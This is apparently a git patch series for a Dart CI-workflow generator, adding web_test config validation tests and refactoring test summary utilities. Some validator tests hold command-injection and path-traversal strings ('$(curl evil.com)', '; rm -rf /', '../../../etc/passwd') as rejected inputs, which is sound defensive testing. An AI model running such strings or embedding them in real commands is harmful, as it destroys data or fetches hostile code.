shared:checkout ── keep in sync with single_platform / multi_platform ── - uses: actions/checkout@v6.0.2 with: <%#format_check%> @@ -472,6 +473,7 @@ jobs: lfs: true <%/lfs%> + # ── shared:git-config ── keep in sync with single_platform / multi_platform ── - name: Configure Git for HTTPS with Token shell: bash run: | @@ -482,10 +484,12 @@ jobs: git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + # ── shared:dart-setup ── keep in sync with single_platform / multi_platform ── - uses: dart-lang/setup-dart@v1.7.1 with: sdk: "<%dart_sdk%>" + # ── shared:pub-cache ── keep in sync with single_platform / multi_platform ── - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: @@ -493,6 +497,15 @@ jobs: key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + # ── shared:proto-setup ── keep in sync with single_platform / multi_platform ── +<%#proto%> + - name: Install protoc + uses: arduino/setup-protoc@v3.0.0 + + - run: dart pub global activate protoc_plugin 25.0.0 + +<%/proto%> + # ── shared:pub-get ── keep in sync with single_platform / multi_platform ── - run: dart pub get env: GIT_LFS_SKIP_SMUDGE: "1" diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 4161089..ee04688 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -524,23 +524,47 @@ void main() { final errors = WorkflowGenerator.validate( _validConfig(webTest: {'concurrency': 0}), ); - expect(errors, anyElement(contains('positive integer'))); + expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency negative produces error', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: {'concurrency': -1}), ); - expect(errors, anyElement(contains('positive integer'))); + expect(errors, anyElement(contains('between 1 and 32'))); + }); + + test('web_test.concurrency exceeds upper bound produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 33}), + ); + expect(errors, anyElement(contains('between 1 and 32'))); + }); + + test('web_test.concurrency double/float produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 3.14}), + ); + expect(errors, anyElement(contains('concurrency must be an integer'))); }); test('web_test.concurrency valid int passes', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 4}), + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: {'concurrency': 4}, + ), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); + test('web_test.concurrency at upper bound (32) passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 32}), + ); + expect(errors.where((e) => e.contains('concurrency')), isEmpty); + }); + test('web_test.concurrency null is fine (defaults to 1)', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: {}), @@ -582,6 +606,46 @@ void main() { expect(errors, anyElement(contains('must not traverse outside the repo'))); }); + test('web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: {'paths': ['test/web/../../../etc/passwd']}, + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); + + test('web_test.paths with shell metacharacters (\$(curl evil)) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [r'$(curl evil)'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with shell metacharacters (; rm -rf /) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['; rm -rf /'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths duplicate (after normalization) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/./foo_test.dart'], + }, + ), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); + test('web_test.paths with backslashes produces error', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: { @@ -627,31 +691,142 @@ void main() { expect(errors, anyElement(contains('newlines/tabs'))); }); - test('valid web_test.paths passes', () { + test('web_test.paths with embedded traversal that escapes repo produces error', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: { - 'paths': ['test/web/foo_test.dart', 'test/web/bar_test.dart'], + 'paths': ['test/../../../etc/passwd'], }), ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); + + test('web_test.paths with embedded .. that stays in repo is fine', () { + // test/web/../../etc/passwd normalizes to etc/passwd (still inside repo) + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/../../etc/passwd'], + }, + ), + ); + expect(errors.where((e) => e.contains('traverse')), isEmpty); + }); + + test('web_test.paths with shell metacharacter \$ produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [r'$(curl evil.com)'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with shell metacharacter ; produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/foo; rm -rf /'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with duplicate paths produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); + + test('web_test.paths with duplicate normalized paths produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/./foo_test.dart', 'test/web/foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); + + test('web_test.paths with trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/foo_test.dart '], + }), + ); + expect(errors, anyElement(contains('whitespace'))); + }); + + test('web_test.paths with tab produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/\tfoo_test.dart'], + }), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }); + + test('valid web_test.paths passes', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/bar_test.dart'], + }, + ), + ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); test('empty web_test.paths list is fine', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'paths': []}), + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: {'paths': []}, + ), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); test('valid full web_test config passes', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'concurrency': 2, - 'paths': ['test/web/'], - }), + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); + + test('web_test with unknown key (typo) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurreny': 2}), // typo: concurreny + ); + expect(errors, anyElement(contains('unknown key "concurreny"'))); + }); + + test('cross-validation: web_test config present but feature disabled produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': false}, + webTest: {'concurrency': 2, 'paths': ['test/web/']}, + ), + ); + expect(errors, anyElement(contains('web_test config is present but ci.features.web_test is not enabled'))); + }); + + test('cross-validation: web_test feature enabled but config wrong type produces error', () { + final config = _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + ); + config['web_test'] = 'yes'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }); }); // ---- fully valid config produces no errors ---- @@ -757,4 +932,68 @@ void main() { ); }); }); + + // =========================================================================== + // P0: render() — web_test output integration tests + // =========================================================================== + group('WorkflowGenerator.render()', () { + Map _minimalValidConfig({bool webTest = false, Map? webTestConfig}) { + return _validConfig( + dartSdk: '3.9.2', + features: { + 'proto': false, + 'lfs': false, + 'format_check': false, + 'web_test': webTest, + }, + platforms: ['ubuntu'], + webTest: webTestConfig, + ); + } + + test('web_test=false: rendered output does not contain web-test job', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: false), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, isNot(contains('web-test:'))); + expect(rendered, isNot(contains('dart test -p chrome'))); + }); + + test('web_test=true: rendered output contains web-test job and chrome test', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('web-test:')); + expect(rendered, contains('dart test -p chrome')); + }); + + test('web_test=true with paths: rendered output includes path args', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'paths': ['test/web/foo_test.dart'], 'concurrency': 2}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains("'test/web/foo_test.dart'")); + expect(rendered, contains('--concurrency=2')); + }); + + test('web_test=true with concurrency at upper bound (32): rendered output uses 32', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'concurrency': 32}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('--concurrency=32')); + }); + }); } From 32bc1f367b8bfb76404e4a334e7d01da41af21f9 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 19:50:01 -0500 Subject: [PATCH 04/16] refactor: consolidate test utils into StepSummary, expand render guard tests - Move TestFailure/TestResults/parsing from test_results_util.dart into step_summary.dart (single shared location) - Delete standalone test_results_util.dart - Add render() guard tests: invalid config, multiple errors, invalid web_test - Add cross-validation edge case tests (null config with feature enabled) - Expand web-test skeleton with additional sync markers - Additional linter-driven cleanup across manage_cicd and workflow_generator Co-Authored-By: Claude Opus 4.6 --- SETUP.md | 2 + USAGE.md | 2 + lib/src/cli/commands/test_command.dart | 55 +- lib/src/cli/manage_cicd.dart | 830 +++++++++++++++----- lib/src/cli/utils/step_summary.dart | 276 ++++++- lib/src/cli/utils/test_results_util.dart | 262 ------ lib/src/cli/utils/workflow_generator.dart | 238 ++++-- templates/github/workflows/ci.skeleton.yaml | 8 +- test/workflow_generator_test.dart | 808 +++++++++++++------ 9 files changed, 1676 insertions(+), 805 deletions(-) delete mode 100644 lib/src/cli/utils/test_results_util.dart diff --git a/SETUP.md b/SETUP.md index 4440965..c011602 100644 --- a/SETUP.md +++ b/SETUP.md @@ -321,6 +321,8 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | | `sub_packages` | list | `[]` | Sub-packages as `[{ "name": "...", "path": "..." }]` | +When `features.web_test` is `true`, the `web_test` object is optional; if omitted, defaults are used (`concurrency: 1`, `paths: []`). + You can add custom steps before/after tests using user-preservable sections in the generated workflow — look for `# --- BEGIN USER: pre-test ---` and `# --- END USER: post-test ---` markers. To add additional jobs (including reusable workflow calls), diff --git a/USAGE.md b/USAGE.md index 4b8422e..c86bb40 100644 --- a/USAGE.md +++ b/USAGE.md @@ -514,6 +514,8 @@ dart run runtime_ci_tooling:manage_cicd test - Generates a rich GitHub Actions step summary with pass/fail/skip counts and failure details - Runs tests in sub-packages (from `ci.sub_packages`) with `pub get` per package +When `ci.features.managed_test=false`, CI falls back to plain `dart test` with no enhanced capture/reporting. + --- ### analyze diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 73c3b60..807a249 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -7,8 +7,8 @@ import 'package:args/command_runner.dart'; import '../../triage/utils/config.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; +import '../utils/step_summary.dart'; import '../utils/sub_package_utils.dart'; -import '../utils/test_results_util.dart'; /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). @@ -27,7 +27,8 @@ class TestCommand extends Command { final String name = 'test'; @override - final String description = 'Run dart test with full output capture and job summary.'; + final String description = + 'Run dart test with full output capture and job summary.'; @override Future run() async { @@ -43,7 +44,9 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + final logDir = + Platform.environment['TEST_LOG_DIR'] ?? + '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); Logger.info('Log directory: $logDir'); @@ -54,7 +57,9 @@ class TestCommand extends Command { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); - _writeTestStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); + StepSummary.write( + '## Test Results\n\n**No test/ directory found — skipped.**\n', + ); } else { // Build test arguments with two file reporters + expanded console output final testArgs = [ @@ -74,7 +79,11 @@ class TestCommand extends Command { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. - final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + final process = await Process.start( + Platform.resolvedExecutable, + testArgs, + workingDirectory: repoRoot, + ); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -94,14 +103,19 @@ class TestCommand extends Command { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + Logger.error( + 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', + ); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + await Future.wait([ + stdoutDone, + stderrDone, + ]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } @@ -113,10 +127,10 @@ class TestCommand extends Command { } // Parse the JSON results file for structured test data - final results = parseTestResultsJson(jsonPath); + final results = StepSummary.parseTestResultsJson(jsonPath); // Generate and write the rich job summary - writeTestJobSummary(results, exitCode, logDir); + StepSummary.writeTestJobSummary(results, exitCode); if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); @@ -166,7 +180,9 @@ class TestCommand extends Command { if (pubGetResult.exitCode != 0) { final pubGetStderr = (pubGetResult.stderr as String).trim(); if (pubGetStderr.isNotEmpty) Logger.error(pubGetStderr); - Logger.error(' dart pub get failed for $name (exit code ${pubGetResult.exitCode})'); + Logger.error( + ' dart pub get failed for $name (exit code ${pubGetResult.exitCode})', + ); failures.add(name); continue; } @@ -181,7 +197,9 @@ class TestCommand extends Command { final spExitCode = await spProcess.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + Logger.error( + 'Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.', + ); spProcess.kill(); // No signal arg — cross-platform safe return -1; }, @@ -196,19 +214,14 @@ class TestCommand extends Command { } if (failures.isNotEmpty) { - Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); + Logger.error( + 'Tests failed for ${failures.length} package(s): ${failures.join(', ')}', + ); + final failureBullets = failures.map((name) => '- `$name`').join('\n'); + StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); exit(1); } Logger.success('All tests passed'); } } - -/// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). -/// No-op when running locally (env var not set). -void _writeTestStepSummary(String markdown) { - final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile != null) { - File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); - } -} diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 5f42793..463b4be 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -6,7 +6,7 @@ import 'dart:io'; import '../triage/utils/run_context.dart'; import '../triage/utils/config.dart'; import 'options/manage_cicd_options.dart'; -import 'utils/test_results_util.dart'; +import 'utils/step_summary.dart'; // Re-export path constants from run_context for use throughout this file. // All CI artifacts live under .runtime_ci/ at the repo root: @@ -86,19 +86,25 @@ String _resolveToolingPackageRoot() { final configFile = File('${dir.path}/.dart_tool/package_config.json'); if (configFile.existsSync()) { try { - final configJson = json.decode(configFile.readAsStringSync()) as Map; + final configJson = + json.decode(configFile.readAsStringSync()) as Map; final packages = configJson['packages'] as List? ?? []; for (final pkg in packages) { - if (pkg is Map && pkg['name'] == 'runtime_ci_tooling') { + if (pkg is Map && + pkg['name'] == 'runtime_ci_tooling') { final rootUri = pkg['rootUri'] as String? ?? ''; if (rootUri.startsWith('file://')) { return Uri.parse(rootUri).toFilePath(); } // Relative URI -- resolve against the .dart_tool/ directory - final resolved = Uri.parse('${dir.path}/.dart_tool/').resolve(rootUri); + final resolved = Uri.parse( + '${dir.path}/.dart_tool/', + ).resolve(rootUri); final resolvedPath = resolved.toFilePath(); // Strip trailing slash - return resolvedPath.endsWith('/') ? resolvedPath.substring(0, resolvedPath.length - 1) : resolvedPath; + return resolvedPath.endsWith('/') + ? resolvedPath.substring(0, resolvedPath.length - 1) + : resolvedPath; } } } catch (_) {} @@ -114,7 +120,9 @@ String _resolveToolingPackageRoot() { } // Fallback: assume scripts/prompts/ (legacy location in consuming repos) - _warn('Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.'); + _warn( + 'Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.', + ); return Directory.current.path; } @@ -193,7 +201,9 @@ void main(List args) async { if (repoRoot == null) { _error('Could not find ${config.repoName} repo root.'); _error('Run this script from inside the repository.'); - _error('If this is a new project, run "init" first to create .runtime_ci/config.json.'); + _error( + 'If this is a new project, run "init" first to create .runtime_ci/config.json.', + ); exit(1); } @@ -288,14 +298,19 @@ Future _runSetup(String repoRoot) async { if (geminiKey != null && geminiKey.isNotEmpty) { _success('GEMINI_API_KEY is set'); } else { - _warn('GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY='); + _warn( + 'GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY=', + ); } - final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + final ghToken = + Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; if (ghToken != null && ghToken.isNotEmpty) { _success('GitHub token is set'); } else { - _info('No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.'); + _info( + 'No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.', + ); } // Install Dart dependencies @@ -351,7 +366,10 @@ Future _runValidate(String repoRoot) async { } } else if (file.endsWith('.dart')) { // Validate Dart files compile - final result = Process.runSync('dart', ['analyze', path], workingDirectory: repoRoot); + final result = Process.runSync('dart', [ + 'analyze', + path, + ], workingDirectory: repoRoot); if (result.exitCode == 0) { _success('Valid Dart: $file'); } else { @@ -411,7 +429,9 @@ Future _runExplore(String repoRoot) async { _header('Stage 1: Explorer Agent (Gemini 3 Pro Preview)'); if (!_geminiAvailable(warnOnly: true)) { - _warn('Skipping explore stage (Gemini unavailable). No changelog data will be generated.'); + _warn( + 'Skipping explore stage (Gemini unavailable). No changelog data will be generated.', + ); return; } @@ -431,7 +451,10 @@ Future _runExplore(String repoRoot) async { _error('Ensure runtime_ci_tooling is properly installed (dart pub get).'); exit(1); } - final prompt = _runSync('dart run $promptScriptPath "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync( + 'dart run $promptScriptPath "$prevTag" "$newVersion"', + repoRoot, + ); if (prompt.isEmpty) { _error('Prompt generator produced empty output. Check $promptScriptPath'); exit(1); @@ -439,7 +462,9 @@ Future _runExplore(String repoRoot) async { ctx.savePrompt('explore', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)', + ); return; } @@ -503,7 +528,11 @@ Future _runExplore(String repoRoot) async { // the workflow artifact upload step. _info(''); _info('Validating Stage 1 artifacts...'); - final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; + final artifactNames = [ + 'commit_analysis.json', + 'pr_data.json', + 'breaking_changes.json', + ]; for (final name in artifactNames) { // Check RunContext path first, then hardcoded fallback final ctxPath = '${ctx.runDir}/explore/$name'; @@ -586,7 +615,10 @@ Future _runCompose(String repoRoot) async { _error('Prompt script not found: $composerScript'); exit(1); } - final prompt = _runSync('dart run $composerScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync( + 'dart run $composerScript "$prevTag" "$newVersion"', + repoRoot, + ); if (prompt.isEmpty) { _error('Composer prompt generator produced empty output.'); exit(1); @@ -594,7 +626,9 @@ Future _runCompose(String repoRoot) async { ctx.savePrompt('compose', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)', + ); return; } @@ -603,7 +637,11 @@ Future _runCompose(String repoRoot) async { // Build the @ includes for file context. // Stage 1 artifacts may be at /tmp/ (CI download) or .runtime_ci/runs/explore/ (local). final includes = []; - final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; + final artifactNames = [ + 'commit_analysis.json', + 'pr_data.json', + 'breaking_changes.json', + ]; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -651,7 +689,8 @@ Future _runCompose(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI exited with code ${result.exitCode}'); - if (composeStderr.isNotEmpty) _warn(' stderr: ${composeStderr.split('\n').first}'); + if (composeStderr.isNotEmpty) + _warn(' stderr: ${composeStderr.split('\n').first}'); } if (rawCompose.isNotEmpty) { @@ -692,7 +731,9 @@ Future _runCompose(String repoRoot) async { try { final bytes = File('$repoRoot/CHANGELOG.md').readAsBytesSync(); changelogContent = String.fromCharCodes(bytes.where((b) => b < 128)); - _info('Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)'); + _info( + 'Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)', + ); } catch (_) { changelogContent = ''; } @@ -747,7 +788,8 @@ Future _runReleaseNotes(String repoRoot) async { _warn('Skipping release notes (Gemini unavailable).'); // Create minimal fallback final newVersion = _versionOverride ?? 'unknown'; - final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = + '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); return; } @@ -757,7 +799,10 @@ Future _runReleaseNotes(String repoRoot) async { final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); // Derive bump type - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); final currentParts = currentVersion.split('.'); final newParts = newVersion.split('.'); String bumpType = 'minor'; @@ -780,17 +825,23 @@ Future _runReleaseNotes(String repoRoot) async { final releaseNotesDir = Directory('$repoRoot/$kReleaseNotesDir/v$newVersion'); releaseNotesDir.createSync(recursive: true); final verifiedContributors = _gatherVerifiedContributors(repoRoot, prevTag); - File( - '${releaseNotesDir.path}/contributors.json', - ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(verifiedContributors)); - _info('Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}'); + File('${releaseNotesDir.path}/contributors.json').writeAsStringSync( + const JsonEncoder.withIndent(' ').convert(verifiedContributors), + ); + _info( + 'Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}', + ); // ── Load issue manifest for verified issue data ── List verifiedIssues = []; - for (final path in ['/tmp/issue_manifest.json', '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json']) { + for (final path in [ + '/tmp/issue_manifest.json', + '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json', + ]) { if (File(path).existsSync()) { try { - final manifest = json.decode(File(path).readAsStringSync()) as Map; + final manifest = + json.decode(File(path).readAsStringSync()) as Map; verifiedIssues = (manifest['github_issues'] as List?) ?? []; } catch (_) {} break; @@ -805,7 +856,10 @@ Future _runReleaseNotes(String repoRoot) async { _error('Prompt script not found: $rnScript'); exit(1); } - final prompt = _runSync('dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', repoRoot); + final prompt = _runSync( + 'dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', + repoRoot, + ); if (prompt.isEmpty) { _error('Release notes prompt generator produced empty output.'); exit(1); @@ -813,7 +867,9 @@ Future _runReleaseNotes(String repoRoot) async { ctx.savePrompt('release-notes', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)', + ); return; } @@ -821,7 +877,11 @@ Future _runReleaseNotes(String repoRoot) async { // Build @ includes -- give Gemini all available context final includes = []; - final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; + final artifactNames = [ + 'commit_analysis.json', + 'pr_data.json', + 'breaking_changes.json', + ]; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -863,7 +923,8 @@ Future _runReleaseNotes(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI failed for release notes: ${result.stderr}'); // Create fallback - final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = + '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); ctx.finalize(exitCode: result.exitCode); return; @@ -900,7 +961,9 @@ Future _runReleaseNotes(String repoRoot) async { content, verifiedContributors: verifiedContributors, verifiedIssues: verifiedIssues, - repoSlug: Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}', + repoSlug: + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}', repoRoot: repoRoot, ); _success('Post-processed release notes: ${content.length} chars'); @@ -920,7 +983,9 @@ Future _runReleaseNotes(String repoRoot) async { if (migrationFile.existsSync()) { _success('Migration guide: ${migrationFile.lengthSync()} bytes'); - File('/tmp/migration_guide.md').writeAsStringSync(migrationFile.readAsStringSync()); + File( + '/tmp/migration_guide.md', + ).writeAsStringSync(migrationFile.readAsStringSync()); } else if (bumpType == 'major') { _warn('Major release but no migration guide generated'); } @@ -934,10 +999,18 @@ Future _runReleaseNotes(String repoRoot) async { } // Build rich step summary - final rnContent = releaseNotesFile.existsSync() ? releaseNotesFile.readAsStringSync() : '(not generated)'; - final migContent = migrationFile.existsSync() ? migrationFile.readAsStringSync() : ''; - final linkedContent = linkedIssuesFile.existsSync() ? linkedIssuesFile.readAsStringSync() : ''; - final hlContent = highlightsFile.existsSync() ? highlightsFile.readAsStringSync() : ''; + final rnContent = releaseNotesFile.existsSync() + ? releaseNotesFile.readAsStringSync() + : '(not generated)'; + final migContent = migrationFile.existsSync() + ? migrationFile.readAsStringSync() + : ''; + final linkedContent = linkedIssuesFile.existsSync() + ? linkedIssuesFile.readAsStringSync() + : ''; + final hlContent = highlightsFile.existsSync() + ? highlightsFile.readAsStringSync() + : ''; _writeStepSummary(''' ## Stage 3: Release Notes Author Complete @@ -971,8 +1044,13 @@ ${_artifactLink()} /// 1. Only contributors who actually committed in THIS release are listed /// 2. GitHub usernames are verified (not guessed from display names) /// 3. Bots are excluded -List> _gatherVerifiedContributors(String repoRoot, String prevTag) { - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; +List> _gatherVerifiedContributors( + String repoRoot, + String prevTag, +) { + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; // Step 1: Get one commit SHA per unique author email in the release range final gitResult = Process.runSync('sh', [ @@ -985,7 +1063,10 @@ List> _gatherVerifiedContributors(String repoRoot, String pr return []; } - final lines = (gitResult.stdout as String).trim().split('\n').where((l) => l.isNotEmpty); + final lines = (gitResult.stdout as String) + .trim() + .split('\n') + .where((l) => l.isNotEmpty); final contributors = >[]; final seenLogins = {}; @@ -996,7 +1077,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr final email = parts[1]; // Skip bot emails - if (email.contains('[bot]') || email.contains('noreply.github.com') && email.contains('bot')) continue; + if (email.contains('[bot]') || + email.contains('noreply.github.com') && email.contains('bot')) + continue; // Step 2: Resolve SHA to verified GitHub login via commits API try { @@ -1009,7 +1092,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr if (ghResult.exitCode == 0) { final login = (ghResult.stdout as String).trim(); - if (login.isNotEmpty && !login.contains('[bot]') && !seenLogins.contains(login)) { + if (login.isNotEmpty && + !login.contains('[bot]') && + !seenLogins.contains(login)) { seenLogins.add(login); contributors.add({'username': login}); } @@ -1020,7 +1105,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr } if (contributors.isEmpty) { - _warn('No contributors resolved from GitHub API, falling back to git names'); + _warn( + 'No contributors resolved from GitHub API, falling 